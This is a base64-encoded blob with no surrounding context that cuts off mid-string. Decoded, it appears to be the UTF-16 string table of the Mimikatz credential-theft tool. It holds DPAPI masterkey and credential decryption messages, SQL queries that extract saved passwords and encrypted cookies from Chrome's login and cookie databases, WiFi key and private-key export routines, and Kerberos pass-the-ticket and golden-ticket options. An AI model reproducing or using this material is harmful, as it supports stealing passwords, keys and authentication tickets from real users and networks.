QAIABmAGkAbABlAAAAAABjAGEAcABpAAAAAABDAEEAUABJACAAawBlAHkAIAB0AGUAcwB0AAAAYwBuAGcAAABDAE4ARwAgAGsAZQB5ACAAdABlAHMAdAAAAAAAYwByAGUAZAAAAAAAQwBSAEUARAAgAHQAZQBzAHQAAAB2AGEAdQBsAHQAAABWAEEAVQBMAFQAIAB0AGUAcwB0AAAAAAB3AGkAZgBpAAAAAABXAGkARgBpACAAdABlAHMAdAAAAHcAdwBhAG4AAAAAAFcAdwBhAG4AIAB0AGUAcwB0AAAAYwBoAHIAbwBtAGUAAAAAAEMAaAByAG8AbQBlACAAdABlAHMAdAAAAGMAYQBjAGgAZQAAAGQAcABhAHAAaQAAAEQAUABBAFAASQAgAE0AbwBkAHUAbABlACAAKABiAHkAIABBAFAASQAgAG8AcgAgAFIAQQBXACAAYQBjAGMAZQBzAHMAKQAAAEQAYQB0AGEAIABQAHIAbwB0AGUAYwB0AGkAbwBuACAAYQBwAHAAbABpAGMAYQB0AGkAbwBuACAAcAByAG8AZwByAGEAbQBtAGkAbgBnACAAaQBuAHQAZQByAGYAYQBjAGUAAABpAG4AAAAAAGQAZQBzAGMAcgBpAHAAdABpAG8AbgAgADoAIAAlAHMACgAAAG8AdQB0AAAAVwByAGkAdABlACAAdABvACAAZgBpAGwAZQAgACcAJQBzACcAIABpAHMAIABPAEsACgAAAGQAYQB0AGEAOgAgAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBiAGwAbwBiACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHIAZQBhAGQARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABkAGEAdABhAAAAAABkAGUAcwBjAHIAaQBwAHQAaQBvAG4AAABlAG4AdAByAG8AcAB5AAAAbQBhAGMAaABpAG4AZQAAAHAAcgBvAG0AcAB0AAAAAABjAAAACgBkAGEAdABhACAAIAAgACAAIAAgACAAIAA6ACAAJQBzAAoAAAAAAGYAbABhAGcAcwAgACAAIAAgACAAIAAgADoAIAAAAAAAcAByAG8AbQBwAHQAIABmAGwAYQBnAHMAOgAgAAAAAABlAG4AdAByAG8AcAB5ACAAIAAgACAAIAA6ACAAAAAAAEIAbABvAGIAOgAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBwAHIAbwB0AGUAYwB0ACAAOwAgAEMAcgB5AHAAdABQAHIAbwB0AGUAYwB0AEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAHAAcgBvAHQAZQBjAHQAZQBkAAAAcwBpAGQAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBtAGEAcwB0AGUAcgBrAGUAeQAgADsAIABDAG8AbgB2AGUAcgB0AFMAdAByAGkAbgBnAFMAaQBkAFQAbwBTAGkAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABoAGEAcwBoAAAAAAAAAAAACgBbAG0AYQBzAHQAZQByAGsAZQB5AF0AIAB3AGkAdABoACAAdgBvAGwAYQB0AGkAbABlACAAYwBhAGMAaABlADoAIAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBtAGEAcwB0AGUAcgBrAGUAeQAgADsAIABOAG8AIABzAHUAaQB0AGEAYgBsAGUAIABrAGUAeQAgAGYAbwB1AG4AZAAgAGkAbgAgAGMAYQBjAGgAZQAKAAAAAAAKAFsAbQBhAHMAdABlAHIAawBlAHkAXQAgAHcAaQB0AGgAIABEAFAAQQBQAEkAXwBTAFkAUwBUAEUATQAgACgAbQBhAGMAaABpAG4AZQAsACAAdABoAGUAbgAgAHUAcwBlAHIAKQA6ACAAAAAqACoAIABNAEEAQwBIAEkATgBFACAAKgAqAAoAAAAAACoAKgAgAFUAUwBFAFIAIAAqACoACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAG0AYQBzAHQAZQByAGsAZQB5ACAAOwAgAGsAdQBsAGwAXwBtAF8AZABwAGEAcABpAF8AdQBuAHAAcgBvAHQAZQBjAHQAXwBtAGEAcwB0AGUAcgBrAGUAeQBfAHcAaQB0AGgAXwBzAGgAYQBEAGUAcgBpAHYAZQBkAGsAZQB5AAoAAAAKAFsAbQBhAHMAdABlAHIAawBlAHkAXQAgAHcAaQB0AGgAIABEAFAAQQBQAEkAXwBTAFkAUwBUAEUATQA6ACAAAAAAAHAAYQBzAHMAdwBvAHIAZAAAAAAAbgBvAHIAbQBhAGwAAAAAAAoAWwBtAGEAcwB0AGUAcgBrAGUAeQBdACAAdwBpAHQAaAAgAHAAYQBzAHMAdwBvAHIAZAA6ACAAJQBzACAAKAAlAHMAIAB1AHMAZQByACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAG0AYQBzAHQAZQByAGsAZQB5ACAAOwAgAGsAdQBsAGwAXwBtAF8AZABwAGEAcABpAF8AdQBuAHAAcgBvAHQAZQBjAHQAXwBtAGEAcwB0AGUAcgBrAGUAeQBfAHcAaQB0AGgAXwBwAGEAcwBzAHcAbwByAGQACgAAAAAACgBbAG0AYQBzAHQAZQByAGsAZQB5AF0AIAB3AGkAdABoACAAaABhAHMAaAA6ACAAAAAAACAAKABuAHQAbABtACAAdAB5AHAAZQApAAoAAAAgACgAcwBoAGEAMQAgAHQAeQBwAGUAKQAKAAAAIAAoAD8AKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBtAGEAcwB0AGUAcgBrAGUAeQAgADsAIABrAHUAbABsAF8AbQBfAGQAcABhAHAAaQBfAHUAbgBwAHIAbwB0AGUAYwB0AF8AbQBhAHMAdABlAHIAawBlAHkAXwB3AGkAdABoAF8AdQBzAGUAcgBIAGEAcwBoAAoAAAAAAAoAWwBkAG8AbQBhAGkAbgBrAGUAeQBdACAAdwBpAHQAaAAgAHYAbwBsAGEAdABpAGwAZQAgAGMAYQBjAGgAZQA6ACAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AbQBhAHMAdABlAHIAawBlAHkAIAA7ACAAawB1AGwAbABfAG0AXwBkAHAAYQBwAGkAXwB1AG4AcAByAG8AdABlAGMAdABfAGQAbwBtAGEAaQBuAGsAZQB5AF8AdwBpAHQAaABfAGsAZQB5AAoAAABwAHYAawAAAAAAAAAKAFsAZABvAG0AYQBpAG4AawBlAHkAXQAgAHcAaQB0AGgAIABSAFMAQQAgAHAAcgBpAHYAYQB0AGUAIABrAGUAeQAKAAAAAAByAHAAYwAAAAoAWwBkAG8AbQBhAGkAbgBrAGUAeQBdACAAdwBpAHQAaAAgAFIAUABDAAoAAAAAAGQAYwAAAAAAZABvAG0AYQBpAG4AAAAAAFsARABDAF0AIAAnACUAcwAnACAAdwBpAGwAbAAgAGIAZQAgAHQAaABlACAAZABvAG0AYQBpAG4ACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAG0AYQBzAHQAZQByAGsAZQB5ACAAOwAgAEQAbwBtAGEAaQBuACAAbgBvAHQAIABwAHIAZQBzAGUAbgB0ACwAIABvAHIAIABkAG8AZQBzAG4AJwB0ACAAbABvAG8AawAgAGwAaQBrAGUAIABhACAARgBRAEQATgAKAAAAWwBEAEMAXQAgACcAJQBzACcAIAB3AGkAbABsACAAYgBlACAAdABoAGUAIABEAEMAIABzAGUAcgB2AGUAcgAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBtAGEAcwB0AGUAcgBrAGUAeQAgADsAIABEAG8AbQBhAGkAbgAgAEMAbwBuAHQAcgBvAGwAbABlAHIAIABuAG8AdAAgAHAAcgBlAHMAZQBuAHQACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAG0AYQBzAHQAZQByAGsAZQB5ACAAOwAgAEkAbgBwAHUAdAAgAG0AYQBzAHQAZQByAGsAZQB5AHMAIABmAGkAbABlACAAbgBlAGUAZABlAGQAIAAoAC8AaQBuADoAZgBpAGwAZQApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGMAcgBlAGQAaABpAHMAdAAgADsAIABDAG8AbgB2AGUAcgB0AFMAdAByAGkAbgBnAFMAaQBkAFQAbwBTAGkAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAcwBoAGEAMQAAAAAACgAgACAAWwBlAG4AdAByAHkAIAAlAHUAXQAgAHcAaQB0AGgAIAB2AG8AbABhAHQAaQBsAGUAIABjAGEAYwBoAGUAOgAgAAAACgAgACAAWwBlAG4AdAByAHkAIAAlAHUAXQAgAHcAaQB0AGgAIABTAEgAQQAxACAAYQBuAGQAIABTAEkARAA6ACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBjAHIAZQBkAGgAaQBzAHQAIAA7ACAASQBuAHAAdQB0ACAAYwByAGUAZABoAGkAcwB0ACAAZgBpAGwAZQAgAG4AZQBlAGQAZQBkACAAKAAvAGkAbgA6AGYAaQBsAGUAKQAKAAAAAAB1AG4AcAByAG8AdABlAGMAdAAAACAAKgAgAHUAcwBpAG4AZwAgAEMAcgB5AHAAdABVAG4AcAByAG8AdABlAGMAdABEAGEAdABhACAAQQBQAEkACgAAAAAAIAAqACAAdgBvAGwAYQB0AGkAbABlACAAYwBhAGMAaABlADoAIAAAACAAKgAgAG0AYQBzAHQAZQByAGsAZQB5ACAAIAAgACAAIAA6ACAAAAAgAD4AIABwAHIAbwBtAHAAdAAgAGYAbABhAGcAcwAgACAAOgAgAAAAIAA+ACAAZQBuAHQAcgBvAHAAeQAgACAAIAAgACAAIAAgADoAIAAAACAAPgAgAHAAYQBzAHMAdwBvAHIAZAAgACAAIAAgACAAIAA6ACAAJQBzAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAHUAbgBwAHIAbwB0AGUAYwB0AF8AcgBhAHcAXwBvAHIAXwBiAGwAbwBiACAAOwAgAEMAcgB5AHAAdABVAG4AcAByAG8AdABlAGMAdABEAGEAdABhACAAKAAwAHgAJQAwADgAeAApAAoAAAAgACAAawBlAHkAIAA6ACAAAAAAACAAIABzAGgAYQAxADoAIAAAAAAAIAAgAHMAaQBkACAAOgAgAAAAAAAgACAAIAAAACAALQAtACAAAAAAACAAIAAgAD4AIABOAFQATABNADoAIAAAACAAIAAgAD4AIABTAEgAQQAxADoAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AbwBlAF8AbQBhAHMAdABlAHIAawBlAHkAXwBhAGQAZAAgADsAIABOAG8AIABHAFUASQBEACAAbwByACAASwBlAHkAIABIAGEAcwBoAD8AAAAAAEcAVQBJAEQAOgAAADsAAABLAGUAeQBIAGEAcwBoADoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAG8AZQBfAGMAcgBlAGQAZQBuAHQAaQBhAGwAXwBhAGQAZAAgADsAIABOAG8AIABTAEkARAA/AAAAAABTAEkARAA6ACUAcwAAAAAATQBEADQAOgAAAAAAUwBIAEEAMQA6AAAATQBEADQAcAA6AAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AbwBlAF8AZABvAG0AYQBpAG4AawBlAHkAXwBhAGQAZAAgADsAIABOAG8AIABHAFUASQBEACAAbwByACAASwBlAHkAPwAAAFIAUwBBAAAATABFAEcAQQBDAFkAAAAAADsAVABZAFAARQA6ACUAcwAKAAAAbQBpAG0AaQBrAGEAdAB6AF8AZABwAGEAcABpAF8AYwBhAGMAaABlAC4AbgBkAHIAAAAAAGYAaQBsAGUAAAAAAGYAbAB1AHMAaAAAAAoAIQAhACEAIABGAEwAVQBTAEgAIABjAGEAYwBoAGUAIAAhACEAIQAKAAAAbABvAGEAZAAAAAAACgBMAE8AQQBEACAAYwBhAGMAaABlAAoAPQA9AD0APQA9AD0APQA9AD0APQAKAAAAAAAAAAoAQwBSAEUARABFAE4AVABJAEEATABTACAAYwBhAGMAaABlAAoAPQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AAoAAAAAAAAACgBNAEEAUwBUAEUAUgBLAEUAWQBTACAAYwBhAGMAaABlAAoAPQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQAKAAAACgBEAE8ATQBBAEkATgBLAEUAWQBTACAAYwBhAGMAaABlAAoAPQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQAKAAAAcwBhAHYAZQAAAAAACgBTAEEAVgBFACAAYwBhAGMAaABlAAoAPQA9AD0APQA9AD0APQA9AD0APQAKAAAAAAAAAEEAdQB0AG8AIABTAEkARAAgAGYAcgBvAG0AIABwAGEAdABoACAAcwBlAGUAbQBzACAAdABvACAAYgBlADoAIAAlAHMACgAAAFcAaQBsAGwAIABlAG4AYwBvAGQAZQA6AAoAIAAqACAAJQAzAHUAIABNAGEAcwB0AGUAcgBLAGUAeQAoAHMAKQAKACAAKgAgACUAMwB1ACAAQwByAGUAZABlAG4AdABpAGEAbAAoAHMAKQAKACAAKgAgACUAMwB1ACAARABvAG0AYQBpAG4ASwBlAHkAKABzACkACgAAAAAARQBuAGMAbwBkAGUAZAA6AAoAIAAqACAAYQBkAGQAcgA6ACAAMAB4ACUAcAAKACAAKgAgAHMAaQB6AGUAOgAgACUAdQAKAAAAVwByAGkAdABlACAAZgBpAGwAZQAgACcAJQBzACcAOgAgAAAATwBLAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBvAGUAXwBTAGEAdgBlAFQAbwBGAGkAbABlACAAOwAgAAoAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AdwByAGkAdABlAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAFIAZQBhAGQAIABmAGkAbABlACAAJwAlAHMAJwA6ACAAAAAAAAAAAAAgACoAIAAlADMAdQAvACUAMwB1ACAATQBhAHMAdABlAHIASwBlAHkAKABzACkAIABpAG0AcABvAHIAdABlAGQACgAAAAAAAAAgACoAIAAlADMAdQAvACUAMwB1ACAAQwByAGUAZABlAG4AdABpAGEAbAAoAHMAKQAgAGkAbQBwAG8AcgB0AGUAZAAKAAAAAAAgACoAIAAlADMAdQAvACUAMwB1ACAARABvAG0AYQBpAG4ASwBlAHkAKABzACkAIABpAG0AcABvAHIAdABlAGQACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAG8AZQBfAEwAbwBhAGQARgByAG8AbQBGAGkAbABlACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHIAZQBhAGQARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAbG9naW5zAABzZWxlY3Qgc2lnbm9uX3JlYWxtLCBvcmlnaW5fdXJsLCB1c2VybmFtZV92YWx1ZSwgcGFzc3dvcmRfdmFsdWUgZnJvbSBsb2dpbnMAAAAAAAoAVQBSAEwAIAAgACAAIAAgADoAIAAlAC4AKgBTACAAKAAgACUALgAqAFMAIAApAAoAVQBzAGUAcgBuAGEAbQBlADoAIAAlAC4AKgBTAAoAAAAAAFAAYQBzAHMAdwBvAHIAZAA6ACAAJQAuACoAUwAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AYwBoAHIAbwBtAGUAIAA7ACAAcwBxAGwAaQB0AGUAMwBfAHMAdABlAHAAOgAgACUAUwAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AYwBoAHIAbwBtAGUAIAA7ACAAcwBxAGwAaQB0AGUAMwBfAHAAcgBlAHAAYQByAGUAXwB2ADIAOgAgACUAUwAKAAAAY29va2llcwBzZWxlY3QgaG9zdF9rZXksIHBhdGgsIG5hbWUsIGNyZWF0aW9uX3V0YywgZXhwaXJlc191dGMsIGVuY3J5cHRlZF92YWx1ZSBmcm9tIGNvb2tpZXMgb3JkZXIgYnkgaG9zdF9rZXksIHBhdGgsIG5hbWUAAAAAAAAKAEgAbwBzAHQAIAAgADoAIAAlAC4AKgBTACAAKAAgACUALgAqAFMAIAApAAoATgBhAG0AZQAgACAAOgAgACUALgAqAFMACgBEAGEAdABlAHMAIAA6ACAAAAAAACAALQA+ACAAAAAAAEMAbwBvAGsAaQBlADoAIAAlAC4AKgBTAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBjAGgAcgBvAG0AZQAgADsAIABOAGUAaQB0AGgAZQByACAAdABoAGUAIAB0AGEAYgBsAGUAIAAnAGwAbwBnAGkAbgBzACcAIABvAHIAIAB0AGgAZQAgAHQAYQBiAGwAZQAgACcAYwBvAG8AawBpAGUAcwAnACAAZQB4AGkAcwB0ACEACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGMAaAByAG8AbQBlACAAOwAgAHMAcQBsAGkAdABlADMAXwBvAHAAZQBuAF8AdgAyADoAIAAlAFMAIAAoACUAUwApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBjAGgAcgBvAG0AZQAgADsAIABzAHEAbABpAHQAZQAzAF8AaQBuAGkAdABpAGEAbABpAHoAZQA6ACAAMAB4ACUAMAA4AHgACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AYwBoAHIAbwBtAGUAIAA7ACAASQBuAHAAdQB0ACAAJwBMAG8AZwBpAG4AIABEAGEAdABhACcAIABmAGkAbABlACAAbgBlAGUAZABlAGQAIAAoAC8AaQBuADoAIgAlACUAbABvAGMAYQBsAGEAcABwAGQAYQB0AGEAJQAlAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAFUAcwBlAHIAIABEAGEAdABhAFwARABlAGYAYQB1AGwAdABcAEwAbwBnAGkAbgAgAEQAYQB0AGEAIgApAAoAAABzZWxlY3QgY291bnQoKikgZnJvbSBzcWxpdGVfbWFzdGVyIHdoZXJlIHR5cGU9J3RhYmxlJyBhbmQgbmFtZT0/AAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGMAaAByAG8AbQBlAF8AaQBzAFQAYQBiAGwAZQBFAHgAaQBzAHQAIAA7ACAAcwBxAGwAaQB0AGUAMwBfAHMAdABlAHAAOgAgACUAUwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGMAaAByAG8AbQBlAF8AaQBzAFQAYQBiAGwAZQBFAHgAaQBzAHQAIAA7ACAAcwBxAGwAaQB0AGUAMwBfAGIAaQBuAGQAXwB0AGUAeAB0ADoAIAAlAFMACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AYwBoAHIAbwBtAGUAXwBpAHMAVABhAGIAbABlAEUAeABpAHMAdAAgADsAIABzAHEAbABpAHQAZQAzAF8AcAByAGUAcABhAHIAZQBfAHYAMgA6ACAAJQBTAAoAAAAAAAAAAABEAGUAYwByAHkAcAB0AGkAbgBnACAATABlAGcAYQBjAHkAIABDAHIAZQBkAGUAbgB0AGkAYQBsACgAcwApADoACgAAAEQAZQBjAHIAeQBwAHQAaQBuAGcAIABDAHIAZQBkAGUAbgB0AGkAYQBsADoACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGMAcgBlAGQAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AcgBlAGEAZABEAGEAdABhACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGMAcgBlAGQAIAA7ACAASQBuAHAAdQB0ACAAQwBSAEUARAAgAGYAaQBsAGUAIABuAGUAZQBkAGUAZAAgACgALwBpAG4AOgBmAGkAbABlACkACgAAAAAAcABvAGwAaQBjAHkAAAAAAEQAZQBjAHIAeQBwAHQAaQBuAGcAIABQAG8AbABpAGMAeQAgAEsAZQB5AHMAOgAKAAAAAAAgACAAQQBFAFMAMQAyADgAIABrAGUAeQA6ACAAAAAAACAAIABBAEUAUwAyADUANgAgAGsAZQB5ADoAIAAAAAAAIAAgAD4AIABBAHQAdAByAGkAYgB1AHQAZQAgACUAdQAgADoAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AdgBhAHUAbAB0ACAAOwAgAEMAcgB5AHAAdABEAGUAYwByAHkAcAB0ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwB2AGEAdQBsAHQAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AcgBlAGEAZABEAGEAdABhACAAKABwAG8AbABpAGMAeQApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AdgBhAHUAbAB0ACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHIAZQBhAGQARABhAHQAYQAgACgAYwByAGUAZAApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAHYAYQB1AGwAdAAgADsAIABJAG4AcAB1AHQAIABDAHIAZQBkACAAZgBpAGwAZQAgAG4AZQBlAGQAZQBkACAAKAAvAGMAcgBlAGQAOgBmAGkAbABlACkACgAAAEQAZQBjAHIAeQBwAHQAaQBuAGcAIABBAFQAXwBTAEkARwBOAEEAVABVAFIARQAgAEUAeABwAG8AcgB0ACAAZgBsAGEAZwBzADoACgAAAAAASGoxZGlRNmtwVXg3VkM0bQAAAAAAAAAARABlAGMAcgB5AHAAdABpAG4AZwAgAEEAVABfAFMASQBHAE4AQQBUAFUAUgBFACAAUAByAGkAdgBhAHQAZQAgAEsAZQB5ADoACgAAAHIAYQB3AF8AcwBpAGcAbgBhAHQAdQByAGUAAABEAGUAYwByAHkAcAB0AGkAbgBnACAAQQBUAF8ARQBYAEMASABBAE4ARwBFACAARQB4AHAAbwByAHQAIABmAGwAYQBnAHMAOgAKAAAAAAAAAEQAZQBjAHIAeQBwAHQAaQBuAGcAIABBAFQAXwBFAFgAQwBIAEEATgBHAEUAIABQAHIAaQB2AGEAdABlACAASwBlAHkAOgAKAAAAAAByAGEAdwBfAGUAeABjAGgAYQBuAGcAZQAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBrAGUAeQBzAF8AYwBhAHAAaQAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwByAGUAYQBkAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGsAZQB5AHMAXwBjAGEAcABpACAAOwAgAEkAbgBwAHUAdAAgAEMAQQBQAEkAIABwAHIAaQB2AGEAdABlACAAawBlAHkAIABmAGkAbABlACAAbgBlAGUAZABlAGQAIAAoAC8AaQBuADoAZgBpAGwAZQApAAoAAAAAAAAARABlAGMAcgB5AHAAdABpAG4AZwAgAFAAcgBpAHYAYQB0AGUAIABQAHIAbwBwAGUAcgB0AGkAZQBzADoACgAAADZqbmtkNUozWmRRRHRyc3UAAAAARABlAGMAcgB5AHAAdABpAG4AZwAgAFAAcgBpAHYAYQB0AGUAIABLAGUAeQA6AAoAAAAAAHhUNXJaVzVxVlZicnZwdUEAAAAAcgBhAHcAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBrAGUAeQBzAF8AYwBuAGcAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AcgBlAGEAZABEAGEAdABhACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGsAZQB5AHMAXwBjAG4AZwAgADsAIABJAG4AcAB1AHQAIABDAE4ARwAgAHAAcgBpAHYAYQB0AGUAIABrAGUAeQAgAGYAaQBsAGUAIABuAGUAZQBkAGUAZAAgACgALwBpAG4AOgBmAGkAbABlACkACgAAAG4AYQBtAGUAAAAAAFAAcgBvAGYAaQBsAGUAIAAnACUAcwAnAAoACgAAAAAAUwBTAEkARAAAAAAAIAAqACAAUwBTAEkARAAgAAAAAABuAGEAbQBlACAAIAAgACAAIAA6ACAAJQBzAAoAAAAAAGgAZQB4AAAAaABlAHgAIAAgACAAIAAgACAAOgAgACUAcwAKAAAAAAA/AAoAAAAAAGEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgAAAAAAIAAqACAAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuADoAIAAlAHMACgAAAAAAZQBuAGMAcgB5AHAAdABpAG8AbgAAAAAAIAAqACAARQBuAGMAcgB5AHAAdABpAG8AbgAgACAAIAAgADoAIAAlAHMACgAAAAAAawBlAHkATQBhAHQAZQByAGkAYQBsAAAAIAAqACAASwBlAHkAIABNAGEAdABlAHIAaQBhAGwAIAAgADoAIAAAAFcARQBQAAAAKABoAGUAeAApACAAAAAAACUALgAqAFMAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AdwBpAGYAaQAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwByAGUAYQBkAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AdwBpAGYAaQAgADsAIABJAG4AcAB1AHQAIABXAGwAYQBuACAAWABNAEwAIABwAHIAbwBmAGkAbABlACAAbgBlAGUAZABlAGQAIAAoAC8AaQBuADoAZgBpAGwAZQApAAoAAABOAGEAbQBlAAAAAABBAGMAYwBlAHMAcwBTAHQAcgBpAG4AZwAAAAAAIAAqACAAQQBjAGMAZQBzAHMAUwB0AHIAaQBuAGcAIAAgACAAIAA6ACAAJQBzAAoAAAAAAFMAdQBiAHMAYwByAGkAYgBlAHIASQBEAAAAAAAgACoAIABTAHUAYgBzAGMAcgBpAGIAZQByAEkARAAgACAAOgAgAAAAJQAuACoAcwAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AdwB3AGEAbgAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwByAGUAYQBkAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AdwB3AGEAbgAgADsAIABJAG4AcAB1AHQAIABXAHcAYQBuACAAWABNAEwAIABwAHIAbwBmAGkAbABlACAAbgBlAGUAZABlAGQAIAAoAC8AaQBuADoAZgBpAGwAZQApAAoAAABLZXJiZXJvcwAAAABwAHQAdAAAAFAAYQBzAHMALQB0AGgAZQAtAHQAaQBjAGsAZQB0ACAAWwBOAFQAIAA2AF0AAAAAAGwAaQBzAHQAAAAAAEwAaQBzAHQAIAB0AGkAYwBrAGUAdAAoAHMAKQAAAAAAYQBzAGsAAABBAHMAawAgAG8AcgAgAGcAZQB0ACAAVABHAFMAIAB0AGkAYwBrAGUAdABzAAAAAAB0AGcAdAAAAFIAZQB0AHIAaQBlAHYAZQAgAGMAdQByAHIAZQBuAHQAIABUAEcAVAAAAAAAcAB1AHIAZwBlAAAAUAB1AHIAZwBlACAAdABpAGMAawBlAHQAKABzACkAAABnAG8AbABkAGUAbgAAAAAAVwBpAGwAbAB5ACAAVwBvAG4AawBhACAAZgBhAGMAdABvAHIAeQAAAEgAYQBzAGgAIABwAGEAcwBzAHcAbwByAGQAIAB0AG8AIABrAGUAeQBzAAAAcAB0AGMAAABQAGEAcwBzAC0AdABoAGUALQBjAGMAYQBjAGgAZQAgAFsATgBUADYAXQAAAGMAbABpAHMAdAAAAAAAAABMAGkAcwB0ACAAdABpAGMAawBlAHQAcwAgAGkAbgAgAE0ASQBUAC8ASABlAGkAbQBkAGEAbABsACAAYwBjAGEAYwBoAGUAAABrAGUAcgBiAGUAcgBvAHMAAAAAAEsAZQByAGIAZQByAG8AcwAgAHAAYQBjAGsAYQBnAGUAIABtAG8AZAB1AGwAZQAAACoAIABEAGkAcgBlAGMAdABvAHIAeQA6ACAAJwAlAHMAJwAKAAAAAAAqAC4AawBpAHIAYgBpAAAACgAqACAARgBpAGwAZQA6ACAAJwAlAHMAJwA6ACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBwAHQAdABfAGYAaQBsAGUAIAA7ACAATABzAGEAQwBhAGwAbABLAGUAcgBiAGUAcgBvAHMAUABhAGMAawBhAGcAZQAgACUAMAA4AHgACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaA